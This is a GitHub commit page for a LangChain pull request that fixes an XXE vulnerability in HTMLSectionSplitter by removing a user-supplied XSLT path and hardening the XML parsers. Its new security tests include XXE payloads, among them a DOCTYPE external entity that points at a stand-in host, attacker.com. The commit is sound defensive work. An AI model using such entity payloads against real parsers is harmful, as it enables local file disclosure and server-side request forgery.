Skip to content

Commit 43eef43

Browse files
authored
security: Remove xslt_path and harden XML parsers in HTMLSectionSplitter: package: langchain-text-splitters (#31819)
## Summary - Removes the `xslt_path` parameter from HTMLSectionSplitter to eliminate XXE attack vector - Hardens XML/HTML parsers with secure configurations to prevent XXE attacks - Adds comprehensive security tests to ensure the vulnerability is fixed ## Context This PR addresses a critical XXE vulnerability discovered in the HTMLSectionSplitter component. The vulnerability allowed attackers to: - Read sensitive local files (SSH keys, passwords, configuration files) - Perform Server-Side Request Forgery (SSRF) attacks - Exfiltrate data to attacker-controlled servers ## Changes Made 1. **Removed `xslt_path` parameter** - This eliminates the primary attack vector where users could supply malicious XSLT files 2. **Hardened XML parsers** - Added security configurations to prevent XXE attacks even with the default XSLT: - `no_network=True` - Blocks network access - `resolve_entities=False` - Prevents entity expansion - `load_dtd=False` - Disables DTD processing - `XSLTAccessControl.DENY_ALL` - Blocks all file/network I/O in XSLT transformations 3. **Added security tests** - New test file `test_html_security.py` with comprehensive tests for various XXE attack vectors 4. **Updated existing tests** - Modified tests that were using the removed `xslt_path` parameter ## Test Plan - [x] All existing tests pass - [x] New security tests verify XXE attacks are blocked - [x] Code passes linting and formatting checks - [x] Tested with both old and new versions of lxml Twitter handle: @_colemurray
1 parent 815d11e commit 43eef43

File tree

3 files changed

+146
-47
lines changed

3 files changed

+146
-47
lines changed

libs/text-splitters/langchain_text_splitters/html.py

Lines changed: 16 additions & 15 deletions
Original file line numberDiff line numberDiff line change
@@ -309,7 +309,6 @@ class HTMLSectionSplitter:
309309
def __init__(
310310
self,
311311
headers_to_split_on: List[Tuple[str, str]],
312-
xslt_path: Optional[str] = None,
313312
**kwargs: Any,
314313
) -> None:
315314
"""Create a new HTMLSectionSplitter.
@@ -318,20 +317,13 @@ def __init__(
318317
headers_to_split_on: list of tuples of headers we want to track mapped to
319318
(arbitrary) keys for metadata. Allowed header values: h1, h2, h3, h4,
320319
h5, h6 e.g. [("h1", "Header 1"), ("h2", "Header 2"].
321-
xslt_path: path to xslt file for document transformation.
322-
Uses a default if not passed.
323-
Needed for html contents that using different format and layouts.
324320
**kwargs (Any): Additional optional arguments for customizations.
325321
326322
"""
327323
self.headers_to_split_on = dict(headers_to_split_on)
328-
329-
if xslt_path is None:
330-
self.xslt_path = (
331-
pathlib.Path(__file__).parent / "xsl/converting_to_header.xslt"
332-
).absolute()
333-
else:
334-
self.xslt_path = pathlib.Path(xslt_path).absolute()
324+
self.xslt_path = (
325+
pathlib.Path(__file__).parent / "xsl/converting_to_header.xslt"
326+
).absolute()
335327
self.kwargs = kwargs
336328

337329
def split_documents(self, documents: Iterable[Document]) -> List[Document]:
@@ -457,11 +449,20 @@ def convert_possible_tags_to_header(self, html_content: str) -> str:
457449
"Unable to import lxml, please install with `pip install lxml`."
458450
) from e
459451
# use lxml library to parse html document and return xml ElementTree
460-
parser = etree.HTMLParser()
461-
tree = etree.parse(StringIO(html_content), parser)
452+
# Create secure parsers to prevent XXE attacks
453+
html_parser = etree.HTMLParser(no_network=True)
454+
xslt_parser = etree.XMLParser(
455+
resolve_entities=False, no_network=True, load_dtd=False
456+
)
457+
458+
# Apply XSLT access control to prevent file/network access
459+
# DENY_ALL is a predefined access control that blocks all file/network access
460+
# Type ignore needed due to incomplete lxml type stubs
461+
ac = etree.XSLTAccessControl.DENY_ALL # type: ignore[attr-defined]
462462

463-
xslt_tree = etree.parse(self.xslt_path)
464-
transform = etree.XSLT(xslt_tree)
463+
tree = etree.parse(StringIO(html_content), html_parser)
464+
xslt_tree = etree.parse(self.xslt_path, xslt_parser)
465+
transform = etree.XSLT(xslt_tree, access_control=ac)
465466
result = transform(tree)
466467
return str(result)
467468

Lines changed: 130 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,130 @@
1+
"""Security tests for HTML splitters to prevent XXE attacks."""
2+
3+
import pytest
4+
5+
from langchain_text_splitters.html import HTMLSectionSplitter
6+
7+
8+
@pytest.mark.requires("lxml", "bs4")
9+
class TestHTMLSectionSplitterSecurity:
10+
"""Security tests for HTMLSectionSplitter to ensure XXE prevention."""
11+
12+
def test_xxe_entity_attack_blocked(self) -> None:
13+
"""Test that external entity attacks are blocked."""
14+
# Create HTML content to process
15+
html_content = """<html><body><p>Test content</p></body></html>"""
16+
17+
# Since xslt_path parameter is removed, this attack vector is eliminated
18+
# The splitter should use only the default XSLT
19+
splitter = HTMLSectionSplitter(headers_to_split_on=[("h1", "Header 1")])
20+
21+
# Process the HTML - should not contain any external entity content
22+
result = splitter.split_text(html_content)
23+
24+
# Verify that no external entity content is present
25+
all_content = " ".join([doc.page_content for doc in result])
26+
assert "root:" not in all_content # /etc/passwd content
27+
assert "XXE Attack Result" not in all_content
28+
29+
def test_xxe_document_function_blocked(self) -> None:
30+
"""Test that XSLT document() function attacks are blocked."""
31+
# Even if someone modifies the default XSLT internally,
32+
# the secure parser configuration should block document() attacks
33+
34+
html_content = (
35+
"""<html><body><h1>Test Header</h1><p>Test content</p></body></html>"""
36+
)
37+
38+
splitter = HTMLSectionSplitter(headers_to_split_on=[("h1", "Header 1")])
39+
40+
# Process the HTML safely
41+
result = splitter.split_text(html_content)
42+
43+
# Should process normally without any security issues
44+
assert len(result) > 0
45+
assert any("Test content" in doc.page_content for doc in result)
46+
47+
def test_secure_parser_configuration(self) -> None:
48+
"""Test that parsers are configured with security settings."""
49+
# This test verifies our security hardening is in place
50+
html_content = """<html><body><h1>Test</h1></body></html>"""
51+
52+
splitter = HTMLSectionSplitter(headers_to_split_on=[("h1", "Header 1")])
53+
54+
# The convert_possible_tags_to_header method should use secure parsers
55+
result = splitter.convert_possible_tags_to_header(html_content)
56+
57+
# Result should be valid transformed HTML
58+
assert result is not None
59+
assert isinstance(result, str)
60+
61+
def test_no_network_access(self) -> None:
62+
"""Test that network access is blocked in parsers."""
63+
# Create HTML that might trigger network access
64+
html_with_external_ref = """<?xml version="1.0"?>
65+
<!DOCTYPE html [
66+
<!ENTITY external SYSTEM "http://attacker.com/xxe">
67+
]>
68+
<html>
69+
<body>
70+
<h1>Test</h1>
71+
<p>&external;</p>
72+
</body>
73+
</html>"""
74+
75+
splitter = HTMLSectionSplitter(headers_to_split_on=[("h1", "Header 1")])
76+
77+
# Process the HTML - should not make network requests
78+
result = splitter.split_text(html_with_external_ref)
79+
80+
# Verify no external content is included
81+
all_content = " ".join([doc.page_content for doc in result])
82+
assert "attacker.com" not in all_content
83+
84+
def test_dtd_processing_disabled(self) -> None:
85+
"""Test that DTD processing is disabled."""
86+
# HTML with DTD that attempts to define entities
87+
html_with_dtd = """<!DOCTYPE html [
88+
<!ELEMENT html (body)>
89+
<!ELEMENT body (h1, p)>
90+
<!ELEMENT h1 (#PCDATA)>
91+
<!ELEMENT p (#PCDATA)>
92+
<!ENTITY test "This is a test entity">
93+
]>
94+
<html>
95+
<body>
96+
<h1>Header</h1>
97+
<p>&test;</p>
98+
</body>
99+
</html>"""
100+
101+
splitter = HTMLSectionSplitter(headers_to_split_on=[("h1", "Header 1")])
102+
103+
# Process the HTML - entities should not be resolved
104+
result = splitter.split_text(html_with_dtd)
105+
106+
# The entity should not be expanded
107+
all_content = " ".join([doc.page_content for doc in result])
108+
assert "This is a test entity" not in all_content
109+
110+
def test_safe_default_xslt_usage(self) -> None:
111+
"""Test that the default XSLT file is used safely."""
112+
# Test with HTML that has font-size styling (what the default XSLT handles)
113+
html_with_font_size = """<html>
114+
<body>
115+
<span style="font-size: 24px;">Large Header</span>
116+
<p>Content under large text</p>
117+
<span style="font-size: 18px;">Small Header</span>
118+
<p>Content under small text</p>
119+
</body>
120+
</html>"""
121+
122+
splitter = HTMLSectionSplitter(headers_to_split_on=[("h1", "Header 1")])
123+
124+
# Process the HTML using the default XSLT
125+
result = splitter.split_text(html_with_font_size)
126+
127+
# Should successfully process the content
128+
assert len(result) > 0
129+
# Large font text should be converted to header
130+
assert any("Large Header" in str(doc.metadata.values()) for doc in result)

libs/text-splitters/tests/unit_tests/test_text_splitters.py

Lines changed: 0 additions & 32 deletions
Original file line numberDiff line numberDiff line change
@@ -3,7 +3,6 @@
33
import random
44
import re
55
import string
6-
from pathlib import Path
76
from typing import Any, Callable, List, Tuple
87

98
import pytest
@@ -2865,37 +2864,6 @@ def test_happy_path_splitting_based_on_header_with_whitespace_chars() -> None:
28652864
assert docs[2].metadata["Header 2"] == "Baz"
28662865

28672866

2868-
@pytest.mark.requires("bs4")
2869-
@pytest.mark.requires("lxml")
2870-
def test_section_splitter_accepts_a_relative_path() -> None:
2871-
html_string = """<html><body><p>Foo</p></body></html>"""
2872-
test_file = Path("tests/test_data/test_splitter.xslt")
2873-
assert test_file.is_file()
2874-
2875-
sec_splitter = HTMLSectionSplitter(
2876-
headers_to_split_on=[("h1", "Header 1"), ("h2", "Header 2")],
2877-
xslt_path=test_file.as_posix(),
2878-
)
2879-
2880-
sec_splitter.split_text(html_string)
2881-
2882-
2883-
@pytest.mark.requires("bs4")
2884-
@pytest.mark.requires("lxml")
2885-
def test_section_splitter_accepts_an_absolute_path() -> None:
2886-
html_string = """<html><body><p>Foo</p></body></html>"""
2887-
test_file = Path("tests/test_data/test_splitter.xslt").absolute()
2888-
assert test_file.is_absolute()
2889-
assert test_file.is_file()
2890-
2891-
sec_splitter = HTMLSectionSplitter(
2892-
headers_to_split_on=[("h1", "Header 1"), ("h2", "Header 2")],
2893-
xslt_path=test_file.as_posix(),
2894-
)
2895-
2896-
sec_splitter.split_text(html_string)
2897-
2898-
28992867
@pytest.mark.requires("bs4")
29002868
@pytest.mark.requires("lxml")
29012869
def test_happy_path_splitting_with_duplicate_header_tag() -> None:

0 commit comments

Comments
 (0)